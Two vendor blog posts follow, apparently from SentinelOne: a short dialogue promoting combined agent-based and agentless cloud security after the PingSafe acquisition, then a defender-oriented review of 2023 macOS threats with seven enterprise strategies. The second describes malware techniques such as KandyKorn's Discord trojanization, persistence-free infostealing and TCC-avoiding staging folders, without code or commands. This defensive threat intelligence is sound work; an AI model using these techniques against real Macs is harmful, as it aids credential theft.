A note on Agent-based and Agentless Cloud Security

Anand

This year we have heard conversations move from Agent vs Agentless to Agent and Agentless, should we talk about that?

Ric

Yes, so there are clear strengths on both sides. SentinelOne has always known that agent-based security allows superior stopping power for attacks as they happen, and increases remediation opportunities. It also allows access to more detailed forensics, so crucial to analysts.

Anand

And agentless controls allow security to extend beyond compute and containers to cloud services like cloud identity, cloud database, and cloud firewall. It also allows for security and visibility free of deployment dependencies.

Ric

Clearly, the answer is that combination of the two makes magic happen! This has been validated by some of the primarily agentless CNAPP vendors, who have publicly reversed their anti-agent stance and are now hard at work building their sensors/agents.

The reality is, however, that while agentless security can be quick to build, agents are not. Building an AI-backed lightweight agent that goes beyond rule-based security, and is capable of machine speed detections with low CPU usage is no easy engineering feat.

We are confident our ability to integrate with PingSafe’s innovative features outpaces agentless vendors who lack the engineering background necessary to create competitive sensors/agents.

Which leads to our combined efforts to redefine the future of cloud security

SentinelOne, as a leader in agent-based Cloud Workload Security (CWS) as well as Cloud Data Security (CDS), has been laser focused on keeping production environments secure.

With the PingSafe acquisition, SentinelOne expands our cloud security capabilities to include Cloud Security Posture Management (CSPM), Container Image Vulnerability Management, Kubernetes Security Posture Management (KSPM), and Infrastructure as Code (IaC) security.  Crucially, PingSafe brings their industry-first attacker approach.

In addition to the Offensive Engine that Anand has described and that highlights legitimate Exploit Paths, there is also advanced Secrets Security that provides internal and external hunting for secrets to help secure sensitive information and prevent unauthorized access due to credential leakage.

Together, SentinelOne presents the future of cloud security

A modern and comprehensive CNAPP that will eliminate the need for companies to navigate the complexity of multiple-point solutions, triage and investigate with incomplete context, or pipe data between disparate data silos. A single AI-powered platform to manage your entire cloud attack surface with prioritized, validated insights. Keep your cloud secure with the full context, real-time interaction and analytics needed to correlate, detect and stop multi-stage attacks in a simple, automated way.

Our commitment is to provide practitioners the industry’s most impactful CNAPP, ensuring best in breed security meets best in class useability and accelerated paths to value.

We are very excited by what we can achieve together. You can read more details about our PingSafe acquisition here.

Ric and Anand.

Protecting macOS |  7 Strategies for Enterprise Security in 2024

Welcome to 2024! It may be a new year for us all, but it’s very much business as usual for cybersecurity professionals. Last year saw an increase in the number and variety of new threats targeting the macOS platform, and as the influence of the Mac continues to expand in enterprise environments, there is little doubt that 2024 will continue that trend.

In this post, we reflect on the lessons we can learn from the last 12 months of threat activity against Apple’s desktop operating system, and offer 7 strategies for defenders to help bolster their threat hunting, detection and mitigation efforts.

1. Don’t Rely on Persistence for Detection

Perhaps the most important lesson that defenders learned from 2023’s crop of macOS malware was that monitoring for persistence methods became a much less reliable way of detecting and hunting threat activity.

2023 saw Mac malware make a significant shift away from OS persistence mechanisms, in part due to Apple introducing notifications for background login items. Instead, infostealers grabbed “all the good stuff” – online credentials, session cookies, keychains – and exfiltrated it in a single hit. Other threat actors made clever use of trojanizing regularly launched software, effectively using the victim’s own behavior as a method of persistence.

Atomic Stealer – (aka “Amos” / “Soma”) provided one of the most widespread examples of a number of different infostealers that emerged during 2023 that eschewed LaunchAgents, LaunchDaemons and other background login mechanisms. Instead, the malware makes use of an AppleScript password spoof to grab the user’s login password in clear text, and uses this to decrypt the keychain and access other stored credentials.

Having stolen everything – including those all important session cookies and internet account credentials – in one fell swoop, the threat actors had no need to ensure the malware ran again. Importantly, avoiding persistence meant evading detection via Apple’s recently introduced Login Items notifications, giving the thieves plenty of time to make use of the stolen credentials.

Atomic Stealer uses a crude but effective means of extracting the user’s login password via AppleScript spoofing

In a different approach, the SmoothOperator (aka 3CX Supply Chain Attack) campaign similarly avoided using OS persistence mechanisms, instead relying on trojanizing an application that the user would launch frequently.

A more elaborate version of the same idea was employed in the KandyKorn campaign, which trojanized the Discord application. A Mach-O payload was written to /Applications/Discord.app/Contents/MacOS/Discord by a previous malware stage, temporarily renaming the genuine Discord executable to .lock. When the user subsequently launches Discord, the payload renames itself to MacOS.tmp, renames the .lock file back to Discord, and executes both the genuine Discord binary and the previous stage malware, causing the entire renaming/reloading process to repeat.

2. Assume Users Can and Will Override Apple Security

Apple has done much work to improve macOS security in recent iterations of the operating system, focusing heavily on privacy and data protections (more on that below) as well as making improvements to its malware remediation tools (formerly MRT, now known as XProtectRemediator). Other changes are in development – in 2023, we saw the first signs of XProtect’s prototype “bastion rules”, which at present silently log access to various data files.

However, unlike iOS,  it is part of the DNA of macOS that users can, if they choose, perform actions that contradict the standing OS security policy. Users can execute unsigned code if they choose, or even override XProtect’s warning that a file is known malware.

Finder File Info Override XProtect
A malicious file’s Info panel allows users to override XProtect

The ability of users to override Apple’s built-in security is a boon for threat actors and a headache for Mac admins. Without deploying an enterprise-level security solution that prevents users from executing suspicious or malicious code, Mac admins are powerless to prevent social engineering attacks from compromising their networks.

In 2023, unsigned or ad-hoc signed malware were by far the most common threats seen across the macOS platform. Such malware was used by all levels of actors, from DPRK-aligned campaigns like RustBucket to infostealers like MetaStealer and Realst Stealer. Such social engineering ranges from sophisticated campaigns involving impersonation and engagement via social media to simply offering users cracked versions of software they do not wish to pay for.

In either case, the route to compromise involves only convincing the user to take a few extra steps to launch the malware. This works regardless of whether the user is admin or not.

Atomic MacStealer masquerades as legitimate applications
Malware beats Gatekeeper with simple instructions for users

3. Don’t Let iOS Exploits Come Back to Haunt Unpatched Macs

2023 saw a record number of zero days impact Apple’s mobile iOS platform, with multiple reports throughout the year of vulnerabilities said to have been exploited in the wild. Although these primarily targeted iPhone users, many of these bugs have a potential exploitation path on macOS.

As enterprise Mac users are under less pressure to update than iOS users, there is undoubtedly a large attack surface waiting to be exploited by attackers: It is not uncommon for threat actors (or, indeed, red teams) to await write ups from security researchers describing patched bugs and then develop exploits for them.

The 19 zero days Apple patched in 2023 were less than 4% of the 515 patched throughout the year. For security teams defending macOS endpoints, keeping the OS up-to-date is a straightforward policy that should be implemented with as little delay as possible.

0-Day CVE ID Module
CVE-2022-42856 WebKit
CVE-2023-23529 WebKit
CVE-2023-28204 WebKit
CVE-2023-28205 WebKit
CVE-2023-28206 IOSurfaceAccelerator
CVE-2023-32373 WebKit
CVE-2023-32409 WebKit
CVE-2023-32434 Kernel
CVE-2023-32435 WebKit
CVE-2023-32439 WebKit
CVE-2023-37450 WebKit
CVE-2023-38606 Kernel
CVE-2023-41061 Wallet
CVE-2023-41064 ImageIO
CVE-2023-41990 FontParser
CVE-2023-41991 Security
CVE-2023-41992 Kernel
CVE-2023-41993 WebKit
CVE-2023-42824 Kernel

4. macOS Ransomware Makes Headlines, But Focus on Data Theft

With ransomware a leading cause of compromise of enterprise Windows systems and increasingly targeting Linux, Cloud and ESXi servers, any new ransomware threats targeting macOS are always headline news. Macs have remained stubbornly immune to major ransomware campaigns largely because locking individual endpoints (as opposed to servers) with no obvious wormable propagation method to spread from Mac to Mac means ransomware developers have had little motive to invest in developing Mac-specific ransomware payloads.

2023 saw the first signs that might change after researchers discovered a prototype LockBit payload for Macs. The macOS samples are compiled solely for the Apple ARM M1/M2 (aka Apple silicon) architecture. No macOS Intel sample is known at this time.

Importantly for concerned users, no occurrences of LockBit for Mac have been reported in the wild, no victims claimed, and no distribution method is known to be associated with the malware. The Mac variant appears to be a direct descendant of the LockBit for Linux variant first spotted in Jan 2022, and contains much the same code.

Another ransomware payload dubbed ‘Turtle’ also came to light in November. Unlike the LockBit sample, Turtle is written in Go and targets the Intel x86_64 architecture.

Turtle ransomware is written in Go
Turtle ransomware is written in Go

However, Turtle ransomware – while technically capable of locking files – has also yet to be seen in the wild or associated with any means of distribution. Given that the sample uses symmetric encryption with a hardcoded key, this also seems like a proof of concept, as victims could decrypt any locked files using the same key.

Turtle ransomware used the hardcoded encryption key “wugui123wugui123”
Turtle ransomware used the hardcoded encryption key “wugui123wugui123”

While it’s reasonably likely that threat actors will continue to experiment with macOS ransomware payloads, we maintain that file locking remains a low-priority threat for Mac defenders. As we have seen elsewhere in the ransomware ecosystem, extortion via data theft has become far more profitable for threat actors.

Given the continued increase in use of Mac computers by C-suite level executives and by developers with access to highly valuable proprietary code, we suggest that the most likely avenue for existing ransomware gangs to pursue regarding macOS targets is the same as the infostealers mentioned above: stealing data, login credentials, and keychains is by far the most lucrative way to extort money from enterprises with Macs in their fleets.

5. Monitor Where Apple’s Data Privacy Protections Fail to Tread

Much of Apple’s focus in hardening macOS over the last few years has revolved around extending a series of data privacy protections known as “TCC”: transparency, consent and control. Any Mac user of recent versions of the OS will have encountered TCC in some form or another: usually via prompts asking for permission to access folders such as the Desktop, Document or Downloads, or hardware such as the microphone or camera.

We have discussed TCC at length in the past, and much of what we said then remains true as we head into 2024. Threat actors (and researchers) continue to find multiple, creative ways around these controls, and patches for many known TCC bypasses figure prominently in 2023’s macOS updates. Others remain unpatched.

In addition to bypassing or hijacking TCC permissions of other applications, malware authors have also taken to simply avoiding writing or accessing folders that might require TCC consent. Two destinations that are always accessible to read and write that malware commonly makes use of are /Users/Shared/ and /private/etc/tmp (aka “tmp”). We’ve also seen some use of the separate /private/var/tmp and the Darwin users’ $TEMP directory for staging malware and downloading payloads.

Deobfuscated strings found in shared.dat backdoor
Deobfuscated strings found in later stage of JokerSpy backdoor

Typically, these locations are used to create malicious application bundles or binaries, launch them, and then ask for permissions to access data of interest, an execution chain that can sidestep TCC controls just so long as the victim willingly offers up a password.

Defenders are advised to pay increasing attention to these locations particularly in light of the rise of infostealers that eschew persistence and other common behavioral patterns noted earlier.

6. Have Runtime, Will Travel | Treat Larger Downloads With Suspicion

Python 2.6 was an ever-present staple in the macOS environment, even long after the widespread adoption of Python 3 elsewhere, and macOS malware authors have a long history of abusing it. However, after Apple removed Python as a system binary, many threat actors responded by switching to cross-platform languages like Go.

In 2023, we saw a great deal of Go-based malware, from infostealers like Atomic to Cobalt Strike implementations like Geacon. In the wild, Geacon payloads were observed in what appeared to be targeted campaigns using phishing document lures and masquerading as fake enterprise-level software.

SecureLink trojan
Geacon dropper masquerading as enterprise software

Along with Go, Rust payloads have also started to become more common. In some cases, malware authors that preferred to continue using python responded by packaging the python runtime with their malware.

Whether its Go, Rust or Python, all these approaches result in larger payloads as they carry their own runtime environment with them, a fact that macOS defenders can and should factor into their detection and threat hunting routines.

7. Secure the Software Supply Chain

Some of the severest attacks on organizations occur through the supply chain. The previously mentioned 3CX/SmoothOperator campaign is notable among these. A trend in evidence extending beyond last year involves compromise of open source software projects including libraries distributed via package managers and public repositories like PyPI, Crate.io and of course GitHub.

As threat actors continue to increase their focus on Macs in the enterprise, we expect to see further attention paid to vulnerabilities in widely used software, as well as the creation and spoofing of code repos for common tasks, particularly with the availability of LLMs like ChatGPT that can easily reproduce such code.

Last year, for example, JokerSpy malware appeared to be using a trojanized QR code generator to achieve initial compromise. The threat actors used an existing project for a commonly required task and inserted a small malicious file among the many legitimate files included.

QRLog changes the path separator to suit Windows or Posix-compatible systems like Linux and macOS
QRLog changes the path separator to suit Windows or Posix-compatible systems like Linux and macOS

This puts the onus on security teams to fully vet code introduced from external sources, to ensure that the code – once vetted – is versioned and maintained by the organization and that updates are also properly scrutinized. That’s not a simple task and it means thinking about a full dev/sec ops environment, or ensuring that macOS-related code is included in any dev/sec ops processes that currently exist.

Conclusion

Enterprise security has, for good reason, been focused on securing Windows systems for so long that it is easy to overlook the Macs in the organization’s fleet. Apple has worked hard to market Macs as ‘secure by design’, but the reality has always been that Macs flew under the radar because the incentive to target them was not nearly so great.

That’s a situation that’s been slowly but steadily changing for some years now, and a look back at 2023 should be enough to convince anyone that Mac threats are becoming both more numerous and more serious for enterprises. Just like other endpoints, Mac devices need to be protected with first-class security software to prevent threats and provide visibility.

If you would like to learn more about how SentinelOne can help defend the macOS devices in your fleet, contact us or request a free demo.